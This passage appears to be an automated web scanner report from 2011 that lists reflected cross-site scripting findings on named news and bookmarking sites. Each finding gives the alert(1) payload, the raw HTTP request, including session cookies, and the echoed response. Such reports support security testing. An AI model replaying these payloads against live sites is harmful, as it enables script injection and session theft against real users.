<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php63e5f"-alert(1)-"65114331d2d";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.765. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f922a"-alert(1)-"ab5ad896ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.php/f922a"-alert(1)-"ab5ad896ba9 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/f922a"-alert(1)-"ab5ad896ba9";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.766. http://www.addthis.com/bookmark.php [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b14"style%3d"x%3aexpression(alert(1))"5b81dfd1d34 was submitted in the v parameter. This input was echoed as c5b14"style="x:expression(alert(1))"5b81dfd1d34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=20c5b14"style%3d"x%3aexpression(alert(1))"5b81dfd1d34 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-20c5b14"style="x:expression(alert(1))"5b81dfd1d34" />
...[SNIP]...

4.767. http://www.berkshireeagle.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.berkshireeagle.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0ba9"><script>alert(1)</script>7e6d2fe4b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f0ba9"><script>alert(1)</script>7e6d2fe4b4=1 HTTP/1.1
Host: www.berkshireeagle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Sat, 29 Jan 2011 02:03:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 02:03:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=N2FW0OYZDCKHMCUUCAWCFEY; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 106563

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Home'><meta name="keywords" content="Berkshire Eagle headlines"/><title>Home - Berkshire Ea
...[SNIP]...
<form action="http://www.berkshireeagle.com/index.html?f0ba9"><script>alert(1)</script>7e6d2fe4b4=1&_DARGS=/portlet/polls/html/display_poll.jsp" name="polls_17227619_1296266606898" method="post">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca6f"-alert(1)-"c91e5761538 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /$|http:fca6f"-alert(1)-"c91e5761538/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393099708.1261781325.2487813376; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:06:01 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31117
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:fca6f"-alert(1)-"c91e5761538";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:fca6f\"-alert(1)-\"c91e5761538/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 989c3</script><script>alert(1)</script>1b58c94f716 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /$|http:/latino.aol.com989c3</script><script>alert(1)</script>1b58c94f716/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240312844.2536784205.3019310080; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:06:03 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com989c3</script><script>alert(1)</script>1b58c94f716/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternal
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85a57</script><script>alert(1)</script>5ec905f2ca9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*85a57</script><script>alert(1)</script>5ec905f2ca9/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.2587377997.113116416; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:06:04 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31109
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*85a57</script><script>alert(1)</script>5ec905f2ca9/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascrip
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 585c5</script><script>alert(1)</script>6640b326e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com585c5</script><script>alert(1)</script>6640b326e5/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334772668.4164436301.809108992; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:06:05 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31108
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com585c5</script><script>alert(1)</script>6640b326e5/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascript:,aol.com,blackvoi
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75dbe</script><script>alert(1)</script>1dc14cd4469 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video75dbe</script><script>alert(1)</script>1dc14cd4469 HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240312844.2536784205.3338077184; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:06:07 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video75dbe</script><script>alert(1)</script>1dc14cd4469";
s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

4.773. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afcc"><script>alert(1)</script>d82b4897c0c was submitted in the REST URL parameter 5. This input was echoed as 4afcc\"><script>alert(1)</script>d82b4897c0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/20114afcc"><script>alert(1)</script>d82b4897c0c/01/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:09:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/20114afcc\"><script>alert(1)</script>d82b4897c0c/01/27/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

4.774. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70037"><script>alert(1)</script>7feba13b723 was submitted in the REST URL parameter 6. This input was echoed as 70037\"><script>alert(1)</script>7feba13b723 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/0170037"><script>alert(1)</script>7feba13b723/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/0170037\"><script>alert(1)</script>7feba13b723/27/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

4.775. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95c27"><script>alert(1)</script>81822d7f333 was submitted in the REST URL parameter 7. This input was echoed as 95c27\"><script>alert(1)</script>81822d7f333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/01/2795c27"><script>alert(1)</script>81822d7f333/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/01/2795c27\"><script>alert(1)</script>81822d7f333/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

4.776. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3652"><script>alert(1)</script>947a9457054 was submitted in the REST URL parameter 8. This input was echoed as d3652\"><script>alert(1)</script>947a9457054 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producerd3652"><script>alert(1)</script>947a9457054/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:11:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producerd3652\"><script>alert(1)</script>947a9457054/">
...[SNIP]...

4.777. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ef4"><script>alert(1)</script>1dd41ef465f was submitted in the REST URL parameter 5. This input was echoed as 19ef4\"><script>alert(1)</script>1dd41ef465f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/201119ef4"><script>alert(1)</script>1dd41ef465f/01/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
